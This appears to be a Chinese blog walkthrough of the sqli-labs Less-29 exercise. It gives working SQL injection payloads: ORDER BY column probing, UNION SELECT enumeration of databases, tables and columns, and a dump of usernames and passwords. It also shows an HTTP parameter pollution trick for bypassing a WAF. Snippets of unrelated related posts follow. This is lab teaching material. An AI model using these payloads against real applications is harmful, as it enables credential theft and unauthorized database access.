Less(29)基於WAF的乙個錯誤

2022-08-23 16:09:10 字數 1862 閱讀 7866

waf是只允許輸入數字的,我們在輸入數字的時候先給waf看然後檢測正常後才**給我們需要訪問的頁面,那篇文章是有寫到的,這裡我弄2個值,乙個是用來欺騙waf的。另乙個才是給我們需要訪問頁面的

看一下這篇部落格,

1.先判斷注入型別

(1)輸入:?id=1

(2)輸入:?id=1 and 1=2

(1)(2)頁面沒有變化,不是數字型

(3)輸入:?id=1'

出現錯誤

(4)輸入:?id=1''

結合(3)(4)id='1'

2.對列數進行判斷:

(1)輸入?id=1' order by 3 --+

(2)輸入?id=1' order by 4 --+

3.八 

結合(1)(2),是3列

3.檢視顯示位,判斷手注位置

(1)輸入?id=-1' union select 1,2,3 --+

2,3為顯示位,此時可在2,3位置進行手注

4.爆破

(1)查詢所有資料庫:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

(2)爆庫:?id=-1' union select 1,database(),3 --+

(3)爆表:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

(4)爆列名:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

(5)爆值:?id=-1' union select 1,group_concat(username,0x7e,password),3 from security.users --+

另外還有別的方法

利用tomcat與apache解析相同請求引數不同的特性,tomcat解析相同請求引數取第乙個,而apache取第二個,如?id=1&id=2,tomcat取得1,apache取得2

乙個hibernate mapping的錯誤

在使用hibernate對映的時候 如果配置 onetomany cascade cascadetype.persist,fetch fetchtype.eager joincolumn name orderid referencedcolumnname order id private setbu...

小紅傘的WAF乙個繞過方法

今天遇到乙個小紅傘的waf,隨手測了下,發現很多都攔截了。但是任何waf都不是萬能的。對此,該waf我發現了乙個缺陷。例如在大小字元上沒有做什麼匹配策略。我可以很輕易的繞過去。雖然沒法構造能夠通過名單的select,但是其他的都繞過去了。把一些敏感的東西發出來,給有需要的人用。select 一開始這...

Less入門一 概述 我的第乙個less

less是一種動態的css樣式語言 less 將 css賦予了動態的語言的特性,如變數,繼承,運算,函式。less既可以在客戶端上執行 支援ie6 webkit chrome,safari,opera firefox 也可以借助node.js或者rhino在伺服器端執行 最新版本2.1.2 從git...